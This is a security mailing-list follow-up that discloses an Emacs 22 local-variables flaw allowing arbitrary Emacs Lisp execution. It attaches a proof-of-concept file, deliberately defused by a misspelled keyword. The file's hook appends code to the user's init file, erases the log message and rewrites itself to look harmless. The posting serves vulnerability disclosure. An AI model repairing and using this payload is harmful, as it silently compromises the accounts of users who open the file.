Just as a followup, I can confirm that this flaw permits the execution of arbitrary Emacs Lisp code. Attached is a file that is almost such an evil file, but with the local variables list neutered similarly to the above. Read the file to see what it does. Once you can execute arbitrary Emacs Lisp code, of course, you can modify arbitrary files that can be written by the Emacs process, and once you can do that, you pretty much have full control over the user's account. Whee.
(Not Cc'ing to the Emacs lists at gnu.org to avoid flooding them with mail from non-subscribed persons; those of you more closely associated can forward if you feel like it.) ---> Drake Wilson
This is a harmless text file. Or at least it looks like one. In fact, it is. But it's almost not. If you were to change the word "variaboles" below to "variables", then load it into a vulnerable Emacs 22 with `enable-local-variables' set to :safe, it would rewrite the local variables list in the buffer itself to _look_ like a harmless text file, while in fact managing to add some evil code to the end of your user-init-file. Woopsy. | Local variaboles: | hack-local-variables-hook: ((lambda () (save-excursion (with-temp-buffer (insert "\n(run-with-timer 1 nil (lambda () (beep) (message \"Your Emacs init file is compromised!\")))") (append-to-file (point-min) (point-max) user-init-file)) (message nil) (with-current-buffer (get-buffer "*Messages*") (when (search-backward (concat "Added to " user-init-file) nil t) (let ((start (point-at-bol))) (forward-line +1) (delete-region start (point))))) (goto-char (point-max)) (search-backward "| hack-local-variables-hook") (let ((start (point-at-bol))) (forward-line +1) (delete-region start (point))) (insert "| mode: text\n") (set-buffer-modified-p nil) (text-mode)))) | End:
